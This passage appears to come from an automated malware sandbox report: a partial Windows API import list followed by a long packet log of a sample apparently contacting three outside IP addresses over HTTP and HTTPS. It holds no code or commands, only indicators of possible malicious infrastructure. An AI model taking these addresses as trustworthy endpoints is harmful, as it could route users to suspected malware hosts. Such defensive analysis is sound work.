QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
OLEAUT32.dll	SysAllocString, SysFreeString, VariantClear
gdiplus.dll	GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 24, 2023 15:28:21.456705093 CET	49702	80	192.168.2.3	208.95.112.1
Mar 24, 2023 15:28:21.488874912 CET	80	49702	208.95.112.1	192.168.2.3
Mar 24, 2023 15:28:21.489051104 CET	49702	80	192.168.2.3	208.95.112.1
Mar 24, 2023 15:28:21.500741005 CET	49702	80	192.168.2.3	208.95.112.1
Mar 24, 2023 15:28:21.534492970 CET	80	49702	208.95.112.1	192.168.2.3
Mar 24, 2023 15:28:21.534642935 CET	49702	80	192.168.2.3	208.95.112.1
Mar 24, 2023 15:28:21.625848055 CET	49703	80	192.168.2.3	84.252.73.140
Mar 24, 2023 15:28:21.687026024 CET	80	49703	84.252.73.140	192.168.2.3
Mar 24, 2023 15:28:21.687259912 CET	49703	80	192.168.2.3	84.252.73.140
Mar 24, 2023 15:28:21.701108932 CET	49703	80	192.168.2.3	84.252.73.140
Mar 24, 2023 15:28:21.761660099 CET	80	49703	84.252.73.140	192.168.2.3
Mar 24, 2023 15:28:22.013144970 CET	80	49703	84.252.73.140	192.168.2.3
Mar 24, 2023 15:28:22.013197899 CET	80	49703	84.252.73.140	192.168.2.3
Mar 24, 2023 15:28:22.013292074 CET	49703	80	192.168.2.3	84.252.73.140
Mar 24, 2023 15:28:22.013401031 CET	49703	80	192.168.2.3	84.252.73.140
Mar 24, 2023 15:28:22.131889105 CET	49705	80	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:22.156016111 CET	80	49705	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:22.156224012 CET	49705	80	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:22.177503109 CET	49705	80	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:22.208038092 CET	80	49705	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:22.208076000 CET	80	49705	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:22.208256006 CET	49705	80	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:22.284658909 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:22.284826994 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:22.284939051 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:22.328064919 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:22.328104019 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:22.423391104 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:22.423574924 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:22.543525934 CET	80	49702	208.95.112.1	192.168.2.3
Mar 24, 2023 15:28:22.543613911 CET	49702	80	192.168.2.3	208.95.112.1
Mar 24, 2023 15:28:22.833085060 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:22.833143950 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:22.833812952 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:22.833957911 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:22.837966919 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:22.838031054 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.334892988 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.334979057 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.335009098 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.335066080 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.335119009 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.335129023 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.335175991 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.335200071 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.335216999 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.335231066 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.335242033 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.335262060 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.335272074 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.335362911 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.335362911 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.359976053 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.360034943 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.360213041 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.360239983 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.360321045 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.360555887 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.360589981 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.360666037 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.360681057 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.360732079 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.360781908 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.360892057 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.360935926 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.360984087 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.360996962 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.361049891 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.361083031 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.388307095 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.388358116 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.388468027 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.388489962 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.388510942 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.388545990 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.388545990 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.388603926 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.388613939 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.388650894 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.388691902 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.389147043 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.389178038 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.389287949 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.389297962 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.389342070 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.389342070 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.389544964 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.389573097 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.389687061 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.389695883 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.389760971 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.389805079 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.414973974 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.415014029 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.415153980 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.415184021 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.415241003 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.415777922 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.415810108 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.415891886 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.415905952 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.415945053 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.415965080 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.416680098 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.416722059 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.416759968 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.416776896 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.416822910 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.416856050 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.417423964 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.417454958 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.417519093 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.417535067 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.417610884 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.417634964 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.418174982 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.418205023 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.418256044 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.418271065 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.418318987 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.418332100 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.443308115 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.443351030 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.443459034 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.443492889 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.443516016 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.443557978 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.444391966 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.444458008 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.444529057 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.444552898 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.444582939 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.444611073 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.445519924 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.445573092 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.445641994 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.445662975 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.445688009 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.445713043 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.446382046 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.446424007 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.446500063 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.446517944 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.446563959 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.446589947 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.470860958 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.470920086 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.470973969 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.471002102 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.471041918 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.471066952 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.471085072 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.471112013 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.471155882 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.471163988 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.471182108 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.471204042 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.471282005 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.471282005 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.472691059 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.472773075 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.472814083 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.472840071 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.472904921 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.472923994 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.473731041 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.473839045 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.473942995 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.473963976 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.474051952 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.474277020 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.474345922 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.474387884 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.474406004 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.474510908 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.474550009 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.497556925 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.497634888 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.497694016 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.497730017 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.497760057 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.497785091 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.498137951 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.498220921 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.498245955 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.498267889 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.498296022 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.498321056 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.499721050 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.499799013 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.499854088 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.500040054 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.500073910 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.500266075 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.501146078 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.501203060 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.501295090 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.501317024 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.501405954 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.501405954 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.501888990 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.501938105 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.502017021 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.502046108 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.502074957 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.502098083 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.522881985 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.522949934 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.523021936 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.523041010 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.523072004 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.523099899 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.523525953 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.523598909 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.523629904 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.523643017 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.523669004 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.523696899 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.523978949 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.524027109 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.524068117 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.524079084 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.524116993 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.524130106 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.527769089 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.527828932 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.527878046 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.527889967 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.527945042 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.527964115 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.528279066 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.528347015 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.528379917 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.528389931 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.528433084 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.528455973 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.528765917 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.528821945 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.528872013 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.528881073 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.528920889 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.528940916 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.536859989 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.550522089 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.550576925 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.550662994 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.550704002 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.550729990 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.550743103 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.550772905 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.550774097 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.550795078 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.550877094 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.550936937 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.553747892 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.553816080 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.553894997 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.553925991 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.553951025 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.553978920 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.553978920 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.554008961 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.554045916 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.554061890 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.554080963 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.554097891 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.554126978 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.554145098 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.554620981 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.554670095 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.554809093 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.554827929 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.554855108 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.554884911 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.555139065 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.555216074 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.555269957 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.555286884 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.555309057 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.555341959 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.574251890 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.574337006 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.574448109 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.574476004 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.574506044 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.574512959 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.574531078 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.574546099 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.574570894 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.574634075 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.574634075 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.574656963 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.574712038 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.578846931 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.578953981 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.578959942 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.578989029 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.579075098 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.579076052 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.579390049 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.579459906 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.579500914 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.579518080 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.579566002 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.579585075 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.579644918 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.579706907 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.579749107 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.579762936 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.579799891 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.579839945 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.580267906 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.580332994 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.580367088 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.580382109 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.580456018 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.601109028 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.601154089 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.601197004 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.601214886 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.601268053 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.601289988 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.601475000 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.601507902 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.601562977 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.601577997 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.601597071 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.601632118 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.604005098 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.604043961 CET	443	49706	144.76.136.153	192.168.2.3
